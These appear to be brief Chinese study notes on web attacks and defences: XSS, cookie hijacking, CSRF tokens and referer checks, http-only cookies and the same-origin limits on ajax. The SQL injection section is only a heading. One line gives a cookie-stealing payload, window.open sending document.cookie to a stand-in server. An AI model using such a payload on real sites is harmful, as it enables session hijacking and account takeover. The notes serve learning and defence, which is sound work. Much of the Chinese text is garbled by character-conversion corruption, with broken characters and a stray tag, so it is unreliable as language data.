1.xss 跨站腳本攻擊(反射型,存儲型)
? ? 偽造會話(基于xss實(shí)現(xiàn)csrf)
? ?劫持cookie:
window.open("http://www.xxx.com/record?secret=" + document.cookie)
自動將他們的cookie信息發(fā)送到攻擊者的服務(wù)器,攻擊者可以在cookie有效期內(nèi)拿他們冒充用戶操作。
? ?惡意代碼執(zhí)行
防御:
輸入過濾。cookie設(shè)置http-only(這樣腳本無法獲取cookie)。
2.csrf 跨站請求偽造
? 偽造用戶身份操作
防御:
驗(yàn)證http referer字段(不嚴(yán)謹(jǐn),因?yàn)榭梢源鄹模?/p>
在請求地址中添加token驗(yàn)證(比如在post中,已參數(shù)形式加入隨機(jī)產(chǎn)生的token)
csrf的前提是cookie驗(yàn)證用戶身份
ajax無法帶cookie驗(yàn)證
ajax受瀏覽器的同源策略限制,ajax默認(rèn)無法請求跨域的接口(當(dāng)然后臺可以設(shè)置access-control-allow-origin:* 之類的允許跨域請求),ajax請求無法攜帶跨域cookie
3.sql注入